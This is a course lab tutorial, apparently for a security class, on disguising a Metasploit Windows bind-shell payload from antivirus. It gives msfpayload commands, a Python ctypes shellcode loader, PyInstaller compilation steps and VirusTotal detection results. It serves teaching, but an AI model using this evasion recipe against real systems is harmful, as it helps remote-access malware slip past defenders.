Proj 8: Antivirus Evasion with Python (20 pts.)

What You Need


Modify malware with Python to evade antivirus. This demonstrates how weak antivirus is.

Generating Malicious Code with Metasploit

Metasploit can generate a lot of malicious code, but it's well-known to antivirus companies and easily recognized in its original form.

In Kali Linux, in a Terminal, execute this command:

msfpayload -l | more
You see many pages of exploits, as shown below.

In Kali Linux, in a Terminal, execute this command:

msfpayload -l | grep windows | grep shell 
You see many ways to bind a shell on Windows, as shown below.

Binding a shell is the simplest form of remote control, listening on a port and allowing anyone who connects to that port to execute command lines.

This is obviously a very insecure thing, and any sensible antivirus will stop it.

In Kali Linux, in a Terminal, execute this command:

msfpayload windows/shell_bind_tcp S 
A summary of this exploit and its options appears, as shown below.

There are two required parameters: EXITFUNC and LPORT, and they are both set to reasonable default values.

In Kali Linux, in a Terminal, execute these commands:

msfpayload windows/shell_bind_tcp X > shell.exe

ls -l shell.exe

An executable is created, as shown below.

Testing the Malware on a Windows Target (Optional)

Move the "shell.exe" file to a Windows system and run it.

If you are using the Windows Server 2008 machine from the "S13" DVD handed out in class, log in as Administrator with a password of P@ssw0rd

You can drag-and-drop it to another virtual machine, or email it, or put it on a USB stick, etc.

When you do that, any antivirus you are using should catch it. For example, here's what happened when I copied that file to my Mac:

If you are willing to turn off the antivirus and run this stuff, here's what you will see.

I used Windows 2008 Server machine without any antivirus software.

I double-clicked "shell.exe" to run it, and a Windows command line now shows it listening on port 4444 in netstat.

Task Manager shows the running "shell.exe" process.

I can control my Windows machine with netcat from Linux:

If you don't want to actually run the software, that's OK--the main point of this project is not using it, but sneaking it past antivirus.

If you did run the malware, kill it in Task Manager, or restart your Windows machine to stop it.

Testing the Malware at VirusTotal

In Kali Linux, open IceWeasel by clicking the blue icon at the top left of the window.

Go to

Click the "Choose File" button.

Browse to your "shell.exe" file and double-click it.

Click the "Scan It!" button.

Your file should be detected as malicious by many of the antivirus engines. When I did it, 37/49 engines detected it, as shown below.

Capturing a Screen Image

Make sure the VirusTotal results are visible, showing that the file is detected as malicious, as shown above.

Click on the host system's taskbar, at the bottom of the screen.

Press the PrntScrn key to capture the whole desktop. Open Paint and paste in the image.

Save the image as "Proj 8a from YOUR NAME".


Creating Malware with Python

In Kali Linux, in a Terminal, execute this command:
msfpayload windows/shell_bind_tcp C 
Exploit code written in C appears, as shown below. What you see here is raw binary machine code in the form of hexadecimal character codes.

To compile the code into a Windows executable, it needs to be in a file. That's easy to do.

In Kali Linux, in a Terminal, execute these commands:

msfpayload windows/shell_bind_tcp C >

ls -l

The file is generated, as shown below.

This code is written in C, not in Python, so some additional lines are needed.

In Kali Linux, in a Terminal, execute this command:

The code appears in the nano text editor, as shown below.

Add this line to the top of the file:

from ctypes import *
That imports the library code needed to run a C program from Python.

Remove all the comment lines.

Remove this line:

unsigned char buf[] =
Add this text to the start of the first line of hexadecimal codes:
shellcode = (
Your screen should now look like this:

In nano, use the down-arrow key to get to the end of the file.

It should look like this:

Add a closing parenthesis before the semicolon at the end of the last line, like this:

Add these lines to the end of the file:

memorywithshell = create_string_buffer(shellcode, len(shellcode))

shell = cast(memorywithshell, CFUNCTYPE(c_void_p))


Your screen should now look like this:

Save the file with Ctrl+X, Y, Enter.

Compiling the Python Code

At this point the exploit could be used on Windows machines with Python installed, but most Windows machines don't have it.

To make it work on every Windows machine, it must be compiled into an EXE.

We'll use pyinstaller. Although, in principle, it runs on Linux, I could not get it to do so in any useful manner.

Get a Windows Machine

We'll use the Windows version of PyInstaller.

Use a Windows machine with no antivirus, such as the Server 2008 virtual machine provided in class.

If you are using the Windows Server 2008 machine from the "S13" DVD handed out in class, log in as Administrator with a password of P@ssw0rd

Turning Off Internet Explorer Enhanced Security Configuration

This is an annoyance that only happens on Server versions of windows. It's intended to deter people from surfing the Internet on a server.

In the lower right of Server Manager, in the "Security Information" section, click the "Configure IE ESC" link, as shown below.

Click both Off buttons, as shown below. Then click OK.

Installing Python 2.7

On Windows, in a Web browser, go to

Click Python 2.7.6 --whatever you do, don't get Python 3 because it's completely different and nothing I know of works with it.

On the next page, click "Windows x86 MSI Installer".

Install the software with the default options.

Installing PyWin32

On Windows, in a Web browser, go to

On the left side, under the "Name" heading, click pywin32, as shown below.

On the next page, click "Build 218".

On the next page, click "pywin32-218.win32-py2.7.exe", as shown below.

Run the EXE file.

Installing pip-Win

On Windows, in a Web browser, go to

Click the Download button.

Run the file. It will install by opening a Command Prompt window, and asking you to "Press any key to continue" many times. Press Enter each time that happens (welcome to 1992).

When it's ready, you will see a pip-Win box like this:

Installing PyInstaller

In pip-Win, in the Command box, type this command:
venv -c -i pyi-env-name
Your screen should look like this:

Click the Run button.

A new command shell window opens. In that window, execute this command:

pip install PyInstaller
PyInstaller downloads and installs, as shown below.

In the future, whenever you want to use PyInstaller,

Start pip-Win
In the Command field enter venv pyi-env-name
Click Run
Then you have a command shell window in which commands execute in that environment.

Verifying the Installation

In the Command Prompt window, execute this command:
pyinstaller --version
The output should be "2.1", as shown below.


If you see an error message saying "Error: PyInstaller for Python 2.6+ on Windows needs pywin32", that means pywin32 did not install correctly.

Reinstall it by executing this command in the black Command Prompt window:

easy_install "C:\Users\Student\Downloads\pywin32-218.win32-py2.7.exe"
You may have to adjust the path to point to the pywin32 file you downloaded.

Moving the Malicious Source Code to Windows

Move the file from your Kali Linux machine to the desktop of your Windows machine. You could drag and drop it, or highlight the contents and copy and paste them to a new Windows file.

Compling the Malware

On Windows, in the Command Prompt window, execute this command:
pyinstaller --onefile --noconsole
This creates a folder named "dist" with the malware inside it, in a file named "shell.exe".

Running the Malware

On your Windows desktop, double-click the dist folder.

Double-click the shell.exe file.

If a 'Windows Security Alert" box pops up, saying "Windows Firewall has blocked some features of this program", click "Allow Access".

In the Command Prompt, execute this command:

netstat -an | findstr 4444
You should see a listening port, as shown below.

Right-click the taskbar at the bottom of the Windows desktop and click "Task Manager". Find the "shell.exe" processes and stop them. There were two of them when I did it.

Testing the Malware at VirusTotal

In Windows, in a Web browser, go to

Click the "Choose File" button.

Browse to your "shell.exe" file and double-click it.

Click the "Scan It!" button.

Your file should be much less detectable now. When I did it, only 1/50 engines detected it, and that was a Heuristic detection, meaning it just seemed to act like a virus but could not be specifically identified, as shown below.

Capturing a Screen Image

Make sure the VirusTotal results are visible, showing that the file is much less detectable, as shown above.

Click on the host system's taskbar, at the bottom of the screen.

Press the PrntScrn key to capture the whole desktop. Open Paint and paste in the image.

Save the image as "Proj 8b from YOUR NAME".


Turning in Your Project

Send the images and passwords to with a subject of "Proj 8 from YOUR NAME".


The textbook: "Violent Python"

Sewing Patches in the Veil AV Evasion Framework

Creating Remote Shells that Bypass Anti-Virus with "Veil"

Last revised: 6-22-14 8:08 am